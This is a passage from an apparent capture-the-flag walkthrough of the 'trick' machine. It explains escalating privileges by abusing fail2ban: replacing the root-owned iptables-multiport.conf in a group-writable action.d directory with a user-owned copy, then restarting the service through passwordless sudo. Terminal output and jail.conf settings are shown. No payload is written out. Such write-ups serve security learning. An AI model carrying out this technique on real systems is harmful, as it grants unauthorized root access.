So we know faile2ban service is running. I checked the GTFObins but nothing there on fail2ban. So after some googling I found exactly what I needed. This blog post explains how to exploit fail2ban service to escalate privileges.
We basically need two conditions that needs to be met:
We need write permission to /etc/fail2ban/action.d/iptables-multiport.conf
We need a way to restart the service, which do not ask for passwords.
The second condition is already met as we see we can run restart without a password with sudo.
For the first condition,
michael@trick:/etc/fail2ban/action.d$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
michael@trick:/etc/fail2ban/action.d$ ls -la
total 288
drwxrwx--- 2 root security 4096 Feb 5 18:15 .
drwxr-xr-x 6 root root 4096 Feb 5 18:15 ..
That file cannot be directly edited as it is not writable by us, but we do have ownership of the directory. So we can move the original .conf file into .conf.bak and copy it to a new .conf file that we are now the owner of and edit it.
cat /etc/fail2ban/jail.conf
# "bantime" is the number of seconds that a host is banned.
bantime = 10s
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 10s
# "maxretry" is the number of failures before a host get banned.
maxretry = 5
